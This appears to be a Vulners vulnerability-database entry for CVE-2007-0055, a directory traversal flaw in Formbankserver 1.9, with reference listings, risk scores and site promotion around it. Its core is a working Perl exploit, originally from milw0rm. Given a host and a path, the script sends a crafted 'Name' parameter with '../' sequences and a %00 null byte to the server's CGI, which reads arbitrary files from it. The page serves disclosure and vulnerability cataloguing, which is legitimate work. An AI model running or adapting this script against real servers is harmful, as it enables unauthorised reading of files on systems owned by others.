Formbankserver 1.9 - 'Name' Directory Traversal
| Reporter | Title | Published | Views | Family All 6 |
|---|---|---|---|---|
| CVE-2007-0055 | 4 Jan 200722:00 | – | cve | |
| CVE-2007-0055 | 4 Jan 200722:00 | – | cvelist | |
| EUVD-2007-0059 | 7 Oct 202500:30 | – | euvd | |
| CVE-2007-0055 | 4 Jan 200722:28 | – | nvd | |
| Directory traversal | 4 Jan 200722:28 | – | prion | |
| Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 3 Jan 200700:00 | – | securityvulns |
#!perl
#found by Bl0od3r
#visit http://dc3.dl.am
#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
#developer:http://www.fersch.de/formbankserver/
use LWP::Simple;
sub usage
{
die("file.pl host.com /../file.txt");
}
$host= $ARGV[0];
$file= $ARGV[1];
if (!$host) {
die("No Host.");
} ; if (!$file) {
die("No File.");
}
getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";
# milw0rm.com [2007-01-01]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jan 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02997